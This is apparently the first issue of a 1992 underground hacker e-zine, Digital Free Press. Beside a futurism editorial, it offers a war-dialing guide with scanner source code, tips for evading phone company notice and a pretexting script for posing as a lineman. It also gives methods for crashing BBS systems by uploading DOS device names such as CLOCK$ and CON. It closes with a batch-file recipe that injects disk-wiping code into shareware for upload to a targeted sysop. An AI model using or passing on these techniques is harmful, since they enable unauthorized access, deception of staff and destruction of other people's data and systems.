######### ############ ######### ########### ############ ########### #### #### #### #### #### #### #### #### #### #### #### #### ######## ########### #### #### ######## ######### #### #### #### #### #### #### #### #### ########### #### #### ######### #### #### DIGITAL FREE PRESS ------------------------------------------------------------------------------- V 1.0 Issue 1.0 January 1992 ------------------------------------------------------------------------------- * A Publication of The Underground Computing Foundation (UCF) * * Send Submissions to: underg!hackers@uunet.uu.net * * Editor: Max Cray (underg!max@uunet.uu.net) * * BBS: The Underground (401) 847-2603 (v.32) * ------------------------------------------------------------------------------ In this Issue: 1. _The Future Computer_ Editorial by Max Cray 2. Phone Number Scanning by GodNet Raider 3. Fun with the CLOCK$ device driver by The Riddler 4. Homegrown Trojan by The BBC ------------------------------------------------------------------------------ The Future Computer by Max Cray In the future, your computer will be a standard household appliance, like your water heater. It will probably be sitting in a back closet someplace rarely seen. It will come with your house. Your house will also have a built in local area network, and there will be terminals in almost every room. The distinction between television, radio, and computer networks will disappear, as the computer becomes the audio, and visual controller. Your television will be a peripheral to your computer. It will receive from a cable and feed into your computer, where you will be able to watch TV from any of the terminals in the house. The terminals will consist of a monitor, probably with a slot for a floppy disk, and a keyboard. Your stereo will also be a peripheral to your computer but specialized music media will disappear as music, movies, and new forms of entertainment will be distributed digitally on normal computer disks, or through the network. Your video camera will also become a computer PERIPHERAL, and the variety of programming will increase exponentially, as private individuals will be able to create their own programming to post on the audiovisual network, for all to experience. There will be national audiovisual networks, and small private networks, similar to computer bulletin boards of today, but they will be more like personal TV stations. Those that watch will also contribute to programming, both real time, and stored. You will be able to have your computer capture any real time event you missed for storage, for you to later experiencing, editing, etc. You will be able to send audio, and audiovisual mail, but normal electronic mail will stay as many will not want to be seen or heard, especially early in the morning. There will be some political decisions to make, as those who control the national computer networks will become very powerful, and freedom of expression issues will continue to crop up, as there will be some who call for regulation. However the power of the national networks will be leveraged by many smaller networks, which will in fact have gateways to each other. There will be centers for the treatment of those addicted to computers. Your spouse will think it none too soon. All the technology I have discussed already exists. The prime factor that is preventing the changes to society is the cost of the technology. As we all know, the cost of technology is always dropping. The speed that society changes is directly related to the speed that the cost of technology drops. ------------------------------------------------------------------------------- To: hackers@underg Subject: Scanning. From: gnr@tsf.UUCP (GodNet Raider) Organization: The CyberUnderground -=[ Intelligent Phone Number Scanning ]=- -or- /**********************************************/ /* How to find the number you are looking for */ /* without the help of a friendly operator. */ /**********************************************/ - written by - GodNet Raider - of - The CyberUnderground -=[ "Information is the greatest weapon of power to the modern wizard." ]=- ]----------------------------------------------------------------------------[ Introduction: ------------- This phile is written to help in the eternal search for a place to jack in. It contains tips that will help to make the most use of phone number scanners and to better target a particular system. Scanning Tools Needed: ---------------------- The only tools needed is a computer, phone number scanner software, and a computer modem. The scanner program is one that dials numbers though your modem under a given prefix and reports if a carrier (the signal that your modem is connected to another modem) was found or not. There are a lot of programs out there that will do this function nicely but for you obsessed prodigies out there the source code for a simple scanner is provided at the end of this phile. Scanning Tips: -------------- 1) When looking for a particular system (company, school, etc..) keep in mind the "+/- ten rule". This rule simply states that most jacks will be found within ten (+/-) sequential instances from the normal business phone number. In larger corporations this could be as much as twenty (+/-). So to find a site with a business number at 555-1212 the scanner should start at 555-1202 and try the next twenty instances (555-1202 to 555-1222) or ten below and above the base number. It should also be noted that in places that had the system installed long after it was established this system may not work. But due to the great size and expense of some systems they are installed day one, so the numbers are assigned to that site (voice, Data, fax, etc..) sequentially. 2) Also in areas with more than one prefix (746, 747, 748) older sites will be found on the lower prefixes (746/747), while newer installations will be found on the higher ones (747/748). 3) Scanning should be done in small bursts to avoid alerting the PhoCo to what you are up to. This means having the scanner only call about 3 numbers in a burst then wait 5 - 10 minutes for the next burst. It is also a good idea to do no more than 50 tries every other day. 4) Don't go jacking right after finding a system. It is good practice to wait a few days to allow any possible suspicion to wane. It is easer to explain a seemingly one time jacking as "... Sorry, must have misdialed a local bbs number. But I did hang up right away as not to break any laws..." Than it is to explain why you misdialed the number 50 times in less than 30 minutes. 5) Social Engineering is always an last resort. Calling the sites business number between 12:30 and 1:30 will allow for the regular sysadmin to leave for lunch leaving an intern or other busy/hurried employee (who does not have the time to talk) to answer your inquiry. Tell the person on the other end something like the following. "Hello, This is linemen Xxxxxxx. I am out here at the junction box and am tracing the line noise problem you reported. The number on my service request does not show data equipment on that line (give the number you are calling at this time)..." If all goes well you should get a response like the following... "Oh it seems you people at the PhoCo have screwed up (everyone likes to take an elitist attitude toward the PhoCo. An love to point out errors and correct them). You have the business number listed as the system number(s). The system number(s) is/are..." Scanner Source Code: -------------------- The following source was written for the IBM pc/clones. As much ansi 'c' was used as possible, but system specific information (like port i/o) has been set off into specific functions so that it can be converted to other systems without having to reinvent the wheel. This program takes information from the command line and writes output to standard i/o. +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+ /* scanner.c by GodNet Raider It is assumed that the serial port and modem have already been setup. Com 1 & 2 only supported. */ #include #include #include #include #include #define FALSE 0 #define TRUE 1 #define DTR_ON(x) outp(anBCom[x]+4,0x03) #define DTR_OFF(x) outp(anBCom[x]+4,0x00) #define CTS(x) inp(anBCom[nPort]+5)&0x0020 #define DATA_READY(x) inp(anBCom[x]+5)&0x0001 char *aszError [] = { "\nUsage: SCANNER \n" "\tPort # - Serial port number to use.\n" "\tPreFix - Static part of phone number(ie. 1-800-555-, 846-, etc..). \n" "\tStart # - last 4 digits of phone number (ie. 1212, 0065, etc..).\n" "\tCount - Number of instances (single stepped) to scan.\n", "\nNumbers are out of range.", "\nModem error." }, *aszTarget [] = { "connect", "busy" }; unsigned int anBCom [] = { 0x3f8, 0x2f8 }; unsigned int Call (unsigned char, char*), receive_chr (unsigned long, unsigned char), send_chr (unsigned char, unsigned char); void FatalError (int), main (int, char**), Wait (unsigned long); void main (argc, argv) int argc; char *argv []; { char szWork [128]; unsigned char nPort; unsigned int nPrsNum, nEndNum; if (argc < 5) FatalError (1); nPort = (unsigned char) atoi (argv [1]) - 1; nEndNum = (nPrsNum = atoi (argv [3])) + atoi (argv [4]); if (nPrsNum > 9999 || nEndNum > 9999 || nEndNum <= nPrsNum || nPort > 1) FatalError (2); while (nPrsNum != nEndNum) { printf ("%s%04i : ", argv [2], nPrsNum); sprintf (szWork, "ATX4Q0V1DT%s%04i\r", argv [2], nPrsNum++); printf ("%sCarrier Found\n", (Call (nPort, szWork) ? "" : "No ")); } exit (0); } unsigned int Call (nPort, ptDialStr) unsigned char nPort; char *ptDialStr; { unsigned long nWait; unsigned int nTmpCnt, nResChr, nRetCode = FALSE; char fCont = TRUE, szWork [256] = "", *ptWork; DTR_ON (nPort); Wait (5); while (*ptDialStr) if (send_chr (*ptDialStr, nPort)) ptDialStr++; else if (!(receive_chr (1l, nPort) & 0xff00)) { outp (anBCom [nPort] + 4, 0x00); FatalError (3); } ptWork = szWork; nWait = time (NULL) + 30; while (time (NULL) < nWait && fCont) { if ((nResChr = receive_chr (1l, nPort)) & 0xff00) { *(ptWork++) = (char) tolower (nResChr & 0x00ff); *ptWork = 0x00; for (nTmpCnt = 2; nTmpCnt && fCont; nTmpCnt--) if (strstr (szWork, aszTarget [nTmpCnt - 1])) { if (--nTmpCnt) printf ("[%s] ", aszTarget [nTmpCnt]); nRetCode = !nTmpCnt; fCont = FALSE; } } } DTR_OFF (nPort); Wait (5); return nRetCode; } unsigned int send_chr (cCh, nPort) unsigned char cCh, nPort; { if (CTS (nPort)) { outp (anBCom [nPort], (int) cCh); return TRUE; } return FALSE; } unsigned int receive_chr (nWait, nPort) unsigned long nWait; unsigned char nPort; { nWait += time (NULL); while (time (NULL) < nWait) if (DATA_READY (nPort)) return ((inp (anBCom [nPort]) & 0x00ff) + 0x0100); return FALSE; } void Wait (nWait) unsigned long nWait; { nWait += time (NULL); while (time (NULL) < nWait); } void FatalError (nErrorNum) int nErrorNum; { printf (aszError [nErrorNum - 1]); exit (nErrorNum); } +---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+ ]============================================================================[ Date: 08-03-91 (01:37) Number: 111 of 124 To: ALL Refer#: NONE From: Read: (N/A) Subj: URGENT Status: PUBLIC MESSAGE Conf: SYSOPS (5) Read Type: GENERAL (-) *** ATTENTION MS-DOS BASED SYSTEM OPERATORS *** This message is not a joke, scare, or farce. Read carefully and please take precautions to prevent potential damage to your system. A RI sysop has found [with the help of a local hacker - Ed] a quite serious problem which appears to be in DOS. The release of this information has to be done VERY carefully because of the potential damage which can be done to bbs systems. (maliciously) IF YOU WANT TO PREVENT DAMAGE TO YOUR SYSTEM: Disable uploads with the pattern of CLO*.* immediately. If you do not, you run the risk of not only crashing the board but losing your CMOS configuration as well. This has been tested with 3 different PCBoard systems, and they were affected immediately. This bug also affected the tested computers in a non bbs environment (ie in DOS). If you would like further information, please arrange a private voice call or page during the day Saturday. Remember, we have to be very careful about this information getting out there until this is addressed and proper precautions have been taken by ALL sysops. This problem is not a virus, trojan, or a particular file.... It is a file NAME which causes this corruption of cmos configurations in 80286+ class machines, regardless of the file contents... The actual filename has been PURPOSELY omitted from this message. Feel free to distribute this notification to any other PRIVATE sysop base in the area. Note: This should not be posted publicly, as it could be a potential security problem and there are likely others that have not been discovered as of yet. Please take any necessary precautions to protect your system. [Editor's note: It's not that hard to run a MEM with the /d flag to find the CLOCK$ device driver.] -------------------------------------------------------------------------- Subject: Phrack 35 From: riddler (The Riddler) In Phrack 35 a letter from The Dark Lord Sarik Malthus asking for the justification of hacking: "...in your mind justify the actions of hackers..." He runs a small bulletin board (running WWIV v.4.20) with an oppressive fashion. He censors email and very strictly dictates behaviour on his BBS. He does this, not by any social standards but by his own, which I admit is admirable...but not when it suppresses FREEDOM OF INFORMATION. The experience he has had with hackers was primarily with me crashing his board by repeatedly finding bugs in the WWIV system. I tried every technique explained in Phrack 34 with no success. However, I am writing to explain a few ways of harmlessly and temporarily crashing any WWIV and most other BBS packages. In the MS-DOG environment we are endowed with a few devices such as: COM1, COM2, AUX, PRN, CON, and CLOCK$, yes there is such a device. Previous to Dark Lord's upgrade to version 4.20 of WWIV he was running version 4.12. Here are two ways to crash that system: Note: Use XMODEM OR ASCII PROTOCOLS, NOT ZMODEM OR YMODEM. - #1 - Goto to the file xfer section. Choose to upload a file. When prompted with the filename, type COM2 (most likely where his modem is). Finding this device as a file, WWIV asks if you would like to add that filename to the file database; say yes. At that point the file "COM2" will appear as a file available for download. Download it. Woooops. A big problem occurs when MS-DOG attempts to read from and write to the same device name simultaneously. Oh well. What will most likely happen is either a hardware lock-up or a dos error message like "Write fault error reading COM2, Abort, Retry...." Both require that a sysop do something to get the system back up. - #2 - Again, goto the file xfer section. Choose to upload a file When prompted with the name say you want to upload clock$.zip (ext. does not matter). Upload any 'ol file on your harddrive, at least 6 bytes or so. That upload will be fed directly to his clock as a new time setting. The bytes being rather random, so will the new date/time. When you complete the xfer WWIV attempts to find out how long you have been xfering for and how much time you have left for that session and completely keels over. It will not recover until the sysop has rebooted and reset the clock or the CMOS-clock (if he has CMOS). Clean cut and annoying. - #3 - (not very thoroughly tested but should word) Everything the same as in the previous to cracks up to the device name. This time upload CON. Upload your favorite ansi bombs and remap often used keys to = nasty dos commands or whatever...on the remote system's keyboard. Hopefully the sysop will have loaded, the regular ansi.sys that comes with DOS. This is being fed directly to his CON -- his keyboard/screen. Try to do this while the sysop is in bed. ------------------------------------------------------------------------------ But oh no! Version 4.20 of WWIV came out. What will we do now? It now prevents users from uploading files by the names of devices altogether. Try these techniques: ------------------------------------------------------------------------------ - #4 Create a zipfile containing a file of no less than 6 bytes (again) with a name of exactly 6 char's. Then, using your FAVORITE hex editor open your zipfile and change the two occurrences of your chosen filename of the file in the zipfile to "ClOck$" (not case sensitive). After the upload is completed goto the archive menu (a submenu off of the xfer menu). Choose to extract a file within your zipfile temporarily. Extract the clock$ within your freshly uploaded zipfile. WWIV, with the assistance of PKzip will extract the contained clock$'s contents and spew every byte right into the clock$ device again. Clock/cmos screwed again. Locking crashing the board and locking the computer up. Woops. #5 Or try this: Goto the archive menu in xfer section choose to (A)dd a file to a temporary archive then, guess what? choose clock$. WWIV, again with help from PKzip will (this time) read (not write) from the clock$. Since it will never reach the EOF it is looking for, as it would in a regular file WWIV keels over again. In this process messing the clock up thoroughly. Locking the board and/or computer up. -------------------------------------------------------------------------- | Uploading clock$ works also, on all PCBoard's versions 14.5 and lower. | -------------------------------------------------------------------------- I have more BBS crashing techniques if you would like them. Other BBS's different techniques. Happy Cracking and a Happy Crashed Year. From of The Underground Computing Foundation. The Riddler underg!riddler@uunet.uu.net [Editors Note: The UCF does not condone destructive actions. This material is distributed to help sysops protect themselves from dangerous users like The Riddler.] ------------------------------------------------------------------------------ Subject: Fun... From: bbc (the bbc) So you say your bored... Want to do something but not sure what... Well how about crashing a smug WWIV sysop! Why not not make a trojan [We mean the horse type] and send it to them. How you say... Well not that weeeeeee... would condone such an act..... But for information purposes only we will give you the method to our madness... Step 1: Make a batch file called "INJECT.BAT" and in it place the following commands - ============================================================ echo off cls echo e cs:0100 b4 19 cd 21 b9 09 00 33 d2 cd 26 > ~~temp.~tp echo w >> ~~temp.~tp echo q >> ~~temp.~tp debug %1 < ~~temp.~tp > nul erase ~~temp.~tp > nul ============================================================== Step 2: Then copy a *.COM file into the same directory. Should be part of some shareware thing that the sysop would like. With docs an all... would not want them to get suspicious, now would we............. Step 3: Run the following command from the dos prompt... INJECT Step 4: Re- zip, arc, lharc, zoo, ect... the thing with it's other files... Step 5: Upload the mess to the unsuspecting sysop and watch the fun! See and you thought hacking was hard...... Of course if they get smug and start searching for the injected code.... We'll just have to add extra code (nops' ect) and switching some of the code around... Next lesson How to bypass Disk protect programs and WWIV door security.... Don't miss it.... Same bat time! Same bat channel! The BBC ------------------------------------------------------------------------------- [Editors note: In case you missed that BBC hack here it is disassembled: 0100 B419 MOV AH,19 'Get Default Drive 0102 CD21 INT 21 'Call DOS 0104 B90900 MOV CX,0009 'Write 9 Sectors 0107 33D2 XOR DX,DX 'Starting as sector 0 0109 CD26 INT 26 'Absolute Disk Write (Oouch!) And thats all she wrote... You can protect yourself from software that does this by using a utility like MIRROR or IMAGE.] Keep those letters coming... The End Downloaded From P-80 International Information Systems 304-744-2253